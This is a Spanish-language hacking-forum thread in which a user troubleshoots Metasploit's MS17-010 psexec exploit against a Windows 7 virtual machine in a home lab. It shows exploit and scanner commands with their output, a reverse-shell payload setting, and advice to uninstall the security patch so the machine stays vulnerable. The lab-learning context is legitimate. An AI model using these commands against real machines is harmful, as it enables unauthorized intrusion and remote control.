Imprimir Página - [SOLUCIONADO] exploit ms17_010

Título: [SOLUCIONADO] exploit ms17_010_psexec no funciona
Publicado por: redferne en Enero 02, 2020, 04:15:39 AM

Saludos:
hasta hace poco en un w7 sp1 usaba el exploit:

use exploit/windows/smb/ms17_010_psexec
set rhost ip-victima
exploit

y conectaba, ahora no conecta pongo el error:

Código (text) [Seleccionar]

[*] Started reverse TCP handler on 192.168.56.4:4444 
[*] 192.168.56.3:445 - Target OS: Windows 7 Ultimate 7600
[-] 192.168.56.3:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

es una maquina virtual en vbox y el adaptador de red esta en solo anfitrion

se me olvidaba:

Código (text) [Seleccionar]

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.56.3
rhost => 192.168.56.3
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 11
THREADS => 11
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.56.3:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x86 (32-bit)
[*] 192.168.56.3:445      - Scanned 1 of 1 hosts (100% complete)

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: DtxdF en Enero 02, 2020, 10:00:49 AM

@redferne (https://underc0de.org/foro/index.php?action=profile;u=52477)

Desactiva el firewall de Windows y nos cuentas ;)

~ DtxdF

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: redferne en Enero 02, 2020, 11:53:53 AM

aunque desconecte el firewall sigo igual:

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

Started reverse TCP handler on 192.168.56.4:4444
192.168.56.3:445 - Target OS: Windows 7 Ultimate 7600
[-] 192.168.56.3:445 - Unable to find accessible named pipe!
Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_psexec) >

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: DeBobiPro en Enero 02, 2020, 01:46:38 PM

hola!

se habrán cargado actualizaciones automáticas en tu windows?

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: DtxdF en Enero 02, 2020, 03:15:35 PM

@redferne (https://underc0de.org/foro/index.php?action=profile;u=52477)

Verifica si ya tienes el parche instalado, sí lo tienes, quitalo.

Link que te puede ayudar: support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-installed

También puedes reinstalar Windows 7 (mucho más fácil si lo estás corriendo en una máquina virtual)

~ DtxdF

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: blackdrake en Enero 06, 2020, 07:53:49 AM

Qué payload estás usando?

Prueba con:

Código (text) [Seleccionar]

set payload windows/x64/shell_reverse_tcp

Un saludo.

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: davidhs en Enero 06, 2020, 08:28:10 PM

Buenas.

A mi me paso algo parecido con un lab que monte hace poco para probar varias cve, en mi caso lo que pasaba es que cuando elegía el tipo de red (pública, doméstica o de trabajo) el Windows dejaba de ser vulnerable a ms17_010, comprueba que no te haya pasado lo mismo que a mí, en mi caso dejaba la opción por defecto.

Un saludo.

Título: Re:exploit ms17_010_psexec no funciona
Publicado por: redferne en Enero 07, 2020, 04:25:50 AM

he reinstalado y vuelve a ser vulnerable.
gracias a tod@s

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: redferne en Enero 02, 2020, 04:15:39 AM